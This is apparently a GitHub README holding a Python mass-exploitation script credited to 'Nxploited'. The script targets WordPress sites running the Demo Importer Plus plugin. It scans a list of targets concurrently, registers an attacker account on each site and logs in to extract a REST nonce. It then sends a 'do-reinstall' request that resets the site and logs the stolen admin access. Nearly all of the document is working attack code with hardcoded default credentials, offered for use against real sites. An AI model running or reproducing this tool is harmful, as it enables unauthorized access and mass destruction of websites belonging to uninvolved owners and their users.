README.md
Rendering markdown...
#!/usr/bin/env python3
#By: Nxploited
from __future__ import annotations
import asyncio
import aiohttp
import socket
import sys
import os
import json
import random
from datetime import datetime
from urllib.parse import urlparse
import urllib3
from colorama import Fore, Style, init as color_init
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
color_init(autoreset=True)
RESULTS_FILE = "diagnostics_results.txt"
PASSED_FILE = "passed_targets.txt"
REGISTER_RESULTS_FILE = "register_results.txt"
EXPLOIT_RESULTS_FILE = "exploit_results.txt"
RESET_RESULTS_FILE = "reset_results.txt"
DEFAULT_TARGETS_FILE = "list.txt"
DEFAULT_CONCURRENCY = 30
DEFAULT_TIMEOUT = 10
MAX_CONCURRENCY = 200
USER_AGENTS = [
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36",
"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:115.0) Gecko/20100101 Firefox/115.0",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 Safari/605.1.15",
]
DEFAULT_REG_USERNAME = "Nxploited"
DEFAULT_REG_PASSWORD = "NxploitedSA"
LOGIN_PATH = "/wp-login.php"
def now_ts() -> str:
return datetime.now().strftime("%Y-%m-%d %H:%M:%S")
def time_tag() -> str:
return datetime.now().strftime("%H:%M:%S")
def rand_ua() -> str:
return random.choice(USER_AGENTS)
def normalize_url(u: str) -> str:
if not u:
return ""
if not u.startswith(("http://", "https://")):
u = "http://" + u
p = urlparse(u)
return f"{p.scheme}://{p.netloc}"
def center_text(s: str, width: int = 80) -> str:
if len(s) >= width:
return s
return s.center(width)
def safe_write_line(path: str, line: str) -> None:
try:
with open(path, "a", encoding="utf-8") as f:
f.write(line + "\n")
f.flush()
try:
os.fsync(f.fileno())
except Exception:
pass
except Exception:
pass
def print_success(msg: str):
tag = time_tag()
print(f"[{tag}] {Fore.GREEN + Style.BRIGHT}SUCCESS{Style.RESET_ALL} {msg}")
def print_fail(msg: str):
tag = time_tag()
print(f"[{tag}] {Fore.RED + Style.DIM}FAIL{Style.RESET_ALL} {msg}")
def draw_banner(width: int = 90):
os.system('cls' if os.name == 'nt' else 'clear')
title_lines = [
" _ _ _ _ _ _ _ _ ",
" / \\ / |_ __ ) / \\ ) |_ __ /| |_|_ _) |_ |_|_ ",
" \\_ \\/ |_ /_ \\_/ /_ _) | | _) |_) | ",
" ",
]
sub = "WP Email Register · Manual Activation · Demo Importer Plus exploit"
github = "GitHub: https://github.com/Nxploited"
telegram = "Telegram: @Kxploit"
line = "─" * (width - 2)
print(Fore.CYAN + "┌" + line + "┐" + Style.RESET_ALL)
for tl in title_lines:
print(Fore.BLUE + "│" + center_text(tl, width - 2) + "│" + Style.RESET_ALL)
print(Fore.CYAN + "├" + line + "┤" + Style.RESET_ALL)
print(Fore.MAGENTA + "│" + center_text(sub, width - 2) + "│" + Style.RESET_ALL)
print(Fore.GREEN + "│" + center_text(github + " " + telegram, width - 2) + "│" + Style.RESET_ALL)
print(Fore.CYAN + "└" + line + "┘" + Style.RESET_ALL)
print()
async def resolve_dns(host: str) -> dict:
loop = asyncio.get_event_loop()
res = {"host": host, "ok": False, "addrs": [], "error": None}
try:
addrs = await loop.run_in_executor(None, socket.getaddrinfo, host, None)
ips = sorted({a[4][0] for a in addrs if a and a[4]})
res["ok"] = True
res["addrs"] = ips
except Exception as e:
res["error"] = str(e)
return res
async def http_get(session: aiohttp.ClientSession, url: str, timeout: int):
out = {"url": url, "status": None, "text_head": None, "error": None}
try:
async with session.get(url, timeout=timeout, ssl=False, allow_redirects=True) as r:
out["status"] = r.status
txt = await r.text(errors="replace")
out["text_head"] = txt[:800]
except Exception as e:
out["error"] = str(e)
return out
async def register_user_wordpress(
raw_target: str,
email: str,
username: str,
password: str,
timeout: int,
sem: asyncio.Semaphore
) -> dict:
target = normalize_url(raw_target)
if not target:
return {"target": raw_target, "status": "invalid_target"}
async with sem:
connector = aiohttp.TCPConnector(limit_per_host=4, ssl=False)
async with aiohttp.ClientSession(connector=connector) as session:
register_url = f"{target}/wp-login.php?action=register"
headers = {"User-Agent": rand_ua(), "Content-Type": "application/x-www-form-urlencoded"}
try:
async with session.get(register_url, timeout=timeout, ssl=False, headers={"User-Agent": rand_ua()}) as r:
reg_page = await r.text(errors="replace")
import re
nonce = None
m = re.search(r'name="_wpnonce"\s+value="([^"]+)"', reg_page)
if m:
nonce = m.group(1)
post_data = {
"user_login": username,
"user_email": email,
"redirect_to": "",
"wp-submit": "Register",
}
if nonce:
post_data["_wpnonce"] = nonce
async with session.post(register_url, data=post_data, timeout=timeout, ssl=False, headers=headers) as resp:
txt = await resp.text(errors="replace")
status = resp.status
snippet = txt[:400]
safe_write_line(
REGISTER_RESULTS_FILE,
json.dumps(
{
"timestamp": now_ts(),
"target": target,
"http_status": status,
"body_snippet": snippet,
"username": username,
"email": email,
},
ensure_ascii=False,
),
)
print_success(f"Register attempt -> {target} (user={username}, email={email}) [Check your email]")
return {"target": target, "status": "register_attempt_sent", "http_status": status}
except Exception as e:
print_fail(f"Register error {target} -> {e} [Check your email]")
safe_write_line(
REGISTER_RESULTS_FILE,
json.dumps(
{
"timestamp": now_ts(),
"target": target,
"status": "register_error",
"error": str(e),
},
ensure_ascii=False,
),
)
return {"target": target, "status": "register_error", "error": str(e)}
async def login_and_get_cookies(
session: aiohttp.ClientSession,
base_url: str,
username: str,
password: str,
timeout: int,
) -> tuple[bool, str]:
login_url = f"{base_url}{LOGIN_PATH}"
headers = {"User-Agent": rand_ua(), "Content-Type": "application/x-www-form-urlencoded", "Referer": login_url}
post_data = {
"log": username,
"pwd": password,
"wp-submit": "Log In",
"testcookie": "1",
"redirect_to": f"{base_url}/wp-admin/",
}
try:
async with session.post(
login_url,
data=post_data,
timeout=timeout,
ssl=False,
allow_redirects=True,
headers=headers,
) as resp:
body = await resp.text(errors="replace")
final_url = str(resp.url)
if "wp-login.php" not in final_url and ("/wp-admin/" in final_url or "dashboard" in body.lower()):
return True, final_url
if "profile.php" in body.lower() or "logout" in body.lower():
return True, final_url
safe_write_line(
EXPLOIT_RESULTS_FILE,
json.dumps(
{
"timestamp": now_ts(),
"target": base_url,
"phase": "login_failed",
"status": resp.status,
"url": final_url,
"body_snippet": body[:400],
},
ensure_ascii=False,
),
)
return False, final_url
except Exception as e:
safe_write_line(
EXPLOIT_RESULTS_FILE,
json.dumps(
{
"timestamp": now_ts(),
"target": base_url,
"phase": "login_error",
"error": str(e),
},
ensure_ascii=False,
),
)
return False, ""
async def extract_wp_rest_nonce(
session: aiohttp.ClientSession,
base_url: str,
timeout: int,
) -> str | None:
url = f"{base_url}/wp-admin/"
try:
async with session.get(url, timeout=timeout, ssl=False, headers={"User-Agent": rand_ua()}) as resp:
txt = await resp.text(errors="replace")
import re
m = re.search(r'wpApiSettings\s*=\s*({.*?});', txt, re.DOTALL)
if m:
try:
js = m.group(1)
js = js.replace("'", '"')
j = json.loads(js)
nonce = j.get("nonce")
if nonce:
safe_write_line(
EXPLOIT_RESULTS_FILE,
json.dumps(
{
"timestamp": now_ts(),
"target": base_url,
"phase": "nonce_extracted_wpApiSettings",
"nonce": nonce,
},
ensure_ascii=False,
),
)
return nonce
except Exception:
pass
m2 = re.search(r'elementorOneSettingsData\s*=\s*({.*?});', txt, re.DOTALL)
if m2:
try:
js = m2.group(1)
js = js.replace("'", '"')
j = json.loads(js)
nonce = j.get("wpRestNonce")
if nonce:
safe_write_line(
EXPLOIT_RESULTS_FILE,
json.dumps(
{
"timestamp": now_ts(),
"target": base_url,
"phase": "nonce_extracted_elementor",
"nonce": nonce,
},
ensure_ascii=False,
),
)
return nonce
except Exception:
pass
safe_write_line(
EXPLOIT_RESULTS_FILE,
json.dumps(
{
"timestamp": now_ts(),
"target": base_url,
"phase": "nonce_not_found",
"status": resp.status,
},
ensure_ascii=False,
),
)
return None
except Exception as e:
safe_write_line(
EXPLOIT_RESULTS_FILE,
json.dumps(
{
"timestamp": now_ts(),
"target": base_url,
"phase": "nonce_error",
"error": str(e),
},
ensure_ascii=False,
),
)
return None
async def do_demo_importer_reset(
session: aiohttp.ClientSession,
base_url: str,
wp_rest_nonce: str,
timeout: int,
) -> tuple[bool, str]:
ajax_url = f"{base_url}/wp-admin/admin-ajax.php?action=demo_importer_plus"
headers = {
"User-Agent": rand_ua(),
"Content-Type": "application/json",
"X-WP-Nonce": wp_rest_nonce,
}
payload = {"demo_action": "do-reinstall"}
try:
async with session.post(ajax_url, json=payload, timeout=timeout, ssl=False, headers=headers) as resp:
txt = await resp.text(errors="replace")
body_snippet = txt[:400]
success = False
try:
j = json.loads(txt)
s_val = j.get("success")
msg = ""
if isinstance(j.get("data"), dict):
msg = j["data"].get("message", "") or msg
msg = msg or j.get("message", "") or ""
if s_val is True and "site has been reset" in msg.lower():
success = True
except Exception:
if '"success":true' in txt.replace(" ", "").lower() and "site has been reset" in txt.lower():
success = True
rec = {
"timestamp": now_ts(),
"target": base_url,
"phase": "do_reinstall",
"status": resp.status,
"body_snippet": body_snippet,
}
safe_write_line(RESET_RESULTS_FILE, json.dumps(rec, ensure_ascii=False))
return success, body_snippet
except Exception as e:
safe_write_line(
RESET_RESULTS_FILE,
json.dumps(
{
"timestamp": now_ts(),
"target": base_url,
"phase": "do_reinstall_error",
"error": str(e),
},
ensure_ascii=False,
),
)
return False, str(e)
async def exploit_demo_importer_target(
raw_target: str,
username: str,
password: str,
timeout: int,
sem: asyncio.Semaphore,
) -> dict:
target = normalize_url(raw_target)
if not target:
return {"target": raw_target, "status": "invalid_target"}
async with sem:
connector = aiohttp.TCPConnector(limit_per_host=4, ssl=False)
async with aiohttp.ClientSession(connector=connector) as session:
base = target
try:
logged_in, final_url = await login_and_get_cookies(session, base, username, password, timeout)
if not logged_in:
print_fail(f"Login failed -> {base} [Check your email and credentials]")
return {"target": base, "status": "login_failed"}
nonce = await extract_wp_rest_nonce(session, base, timeout)
if not nonce:
print_fail(f"Nonce not found -> {base}")
return {"target": base, "status": "nonce_not_found"}
ok_reset, snippet = await do_demo_importer_reset(session, base, nonce, timeout)
if ok_reset:
print_success(f'success":true,"message":"Site has been reset successfully" -> {base}')
line = f"{base}{LOGIN_PATH} site:{base}{LOGIN_PATH} user:{username} pass:{password} type:admin"
safe_write_line(EXPLOIT_RESULTS_FILE, line)
return {"target": base, "status": "reset_success", "snippet": snippet}
else:
print_fail(f"RESET FAIL -> {base}")
return {"target": base, "status": "reset_failed", "snippet": snippet}
except asyncio.CancelledError:
raise
except Exception as e:
print_fail(f"{base} error: {e}")
safe_write_line(
EXPLOIT_RESULTS_FILE,
json.dumps(
{
"timestamp": now_ts(),
"target": base,
"status": "error",
"error": str(e),
},
ensure_ascii=False,
),
)
return {"target": base, "status": "error", "error": str(e)}
async def probe_target(raw_target: str, timeout: int, sem: asyncio.Semaphore) -> dict:
target = normalize_url(raw_target)
parsed = urlparse(target)
host = parsed.netloc
result = {
"timestamp": now_ts(),
"target": target,
"dns": None,
"root": None,
"wp_login": None,
"admin_ajax": None,
"rest_users": None,
"errors": []
}
async with sem:
dns = await resolve_dns(host)
result["dns"] = dns
if not dns["ok"]:
result["errors"].append(f"DNS: {dns.get('error')}")
return result
connector = aiohttp.TCPConnector(limit_per_host=4, ssl=False)
headers = {
"User-Agent": rand_ua(),
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
}
async with aiohttp.ClientSession(connector=connector, headers=headers) as session:
paths = {
"root": f"{target}/",
"wp_login": f"{target}/wp-login.php",
"admin_ajax": f"{target}/wp-admin/admin-ajax.php",
"rest_users": f"{target}/wp-json/wp/v2/users",
}
for key, url in paths.items():
r = await http_get(session, url, timeout)
result[key] = r
if r.get("error"):
result["errors"].append(f"{key}: {r['error']}")
else:
if r.get("status") in (403, 429, 503, 500):
result["errors"].append(f"{key}: HTTP {r.get('status')}")
return result
async def run_diagnose_mode_async(targets: list[str], concurrency: int, timeout: int):
sem = asyncio.Semaphore(concurrency)
tasks = [asyncio.create_task(probe_target(t, timeout, sem)) for t in targets]
passed = []
failed = []
try:
f_res = open(RESULTS_FILE, "w", encoding="utf-8")
except Exception:
f_res = None
for coro in asyncio.as_completed(tasks):
try:
r = await coro
except Exception:
print_fail("unknown-target")
continue
success = (not r.get("errors"))
if not success:
print_fail(r["target"])
if f_res:
try:
f_res.write(json.dumps(r, ensure_ascii=False) + "\n")
except Exception:
pass
if success:
passed.append(r["target"])
try:
with open(PASSED_FILE, "a", encoding="utf-8") as pf:
pf.write(r["target"] + "\n")
except Exception:
pass
else:
failed.append(r["target"])
if f_res:
f_res.close()
print()
print(Fore.CYAN + "Run complete." + Style.RESET_ALL, end=" ")
print(f"{len(passed)} passed (silent), {len(failed)} failed. Results -> {RESULTS_FILE}")
return passed, failed
async def run_register_mode(targets: list[str], concurrency: int, timeout: int, email: str, username: str, password: str):
sem = asyncio.Semaphore(concurrency)
tasks = [
asyncio.create_task(register_user_wordpress(t, email, username, password, timeout, sem))
for t in targets
]
results = await asyncio.gather(*tasks, return_exceptions=True)
return results
async def run_exploit_mode(targets: list[str], concurrency: int, timeout: int, username: str, password: str):
sem = asyncio.Semaphore(concurrency)
tasks = [
asyncio.create_task(exploit_demo_importer_target(t, username, password, timeout, sem))
for t in targets
]
results = await asyncio.gather(*tasks, return_exceptions=True)
return results
def load_targets(file_path: str) -> list[str]:
try:
with open(file_path, "r", encoding="utf-8") as fh:
return [l.strip() for l in fh if l.strip()]
except Exception as e:
print(f"Failed to load targets file '{file_path}': {e}")
return []
def prompt_inputs():
draw_banner()
print(Fore.YELLOW + "Select mode:" + Style.RESET_ALL)
print(" 1) Diagnose only (probe WordPress endpoints)")
print(" 2) Register only (WordPress registration) [After run: check your email]")
print(" 3) Exploit Demo Importer Plus (login + do-reinstall) [Ensure account is activated via email first]")
mode = input("Mode [1/2/3] [default: 1]: ").strip() or "1"
targets_file = input(f"Targets file (one per line) [default: {DEFAULT_TARGETS_FILE}]: ").strip() or DEFAULT_TARGETS_FILE
try:
concurrency = int(input(f"Concurrency (speed) [default: {DEFAULT_CONCURRENCY}, max {MAX_CONCURRENCY}]: ").strip() or str(DEFAULT_CONCURRENCY))
concurrency = max(1, min(MAX_CONCURRENCY, concurrency))
except Exception:
concurrency = DEFAULT_CONCURRENCY
try:
timeout = int(input(f"Timeout seconds [default: {DEFAULT_TIMEOUT}]: ").strip() or str(DEFAULT_TIMEOUT))
timeout = max(3, timeout)
except Exception:
timeout = DEFAULT_TIMEOUT
email = ""
username = DEFAULT_REG_USERNAME
password = DEFAULT_REG_PASSWORD
if mode == "2":
print()
print(Fore.CYAN + "Registration mode (after run: check your email)" + Style.RESET_ALL)
email = input("Email to register with (required): ").strip()
if not email:
print("Email is required for registration mode.")
sys.exit(1)
username = input(f"Username [default: {DEFAULT_REG_USERNAME}]: ").strip() or DEFAULT_REG_USERNAME
password = input(f"Password (local note only) [default: {DEFAULT_REG_PASSWORD}]: ").strip() or DEFAULT_REG_PASSWORD
if mode == "3":
print()
print(Fore.CYAN + "Exploit mode (Demo Importer Plus do-reinstall) [ensure account is activated via email]" + Style.RESET_ALL)
print(f"Default credentials: user={DEFAULT_REG_USERNAME} pass={DEFAULT_REG_PASSWORD}")
username = input(f"Exploit username [default: {DEFAULT_REG_USERNAME}]: ").strip() or DEFAULT_REG_USERNAME
password = input(f"Exploit password [default: {DEFAULT_REG_PASSWORD}]: ").strip() or DEFAULT_REG_PASSWORD
return mode, targets_file, concurrency, timeout, email, username, password
def main():
mode, targets_file, concurrency, timeout, email, username, password = prompt_inputs()
targets = load_targets(targets_file)
if not targets:
print("No targets found. Exiting.")
sys.exit(1)
try:
open(RESULTS_FILE, "a", encoding="utf-8").close()
open(PASSED_FILE, "a", encoding="utf-8").close()
open(REGISTER_RESULTS_FILE, "a", encoding="utf-8").close()
open(EXPLOIT_RESULTS_FILE, "a", encoding="utf-8").close()
open(RESET_RESULTS_FILE, "a", encoding="utf-8").close()
except Exception:
pass
print(f"Starting: mode={mode} targets={len(targets)} concurrency={concurrency} timeout={timeout}s")
try:
if mode == "1":
asyncio.run(run_diagnose_mode_async(targets, concurrency, timeout))
elif mode == "2":
asyncio.run(run_register_mode(targets, concurrency, timeout, email, username, password))
elif mode == "3":
asyncio.run(run_exploit_mode(targets, concurrency, timeout, username, password))
else:
print("Unknown mode. Exiting.")
except KeyboardInterrupt:
print("\nInterrupted by user.")
except Exception as e:
print(f"Fatal: {e}")
if __name__ == "__main__":
main()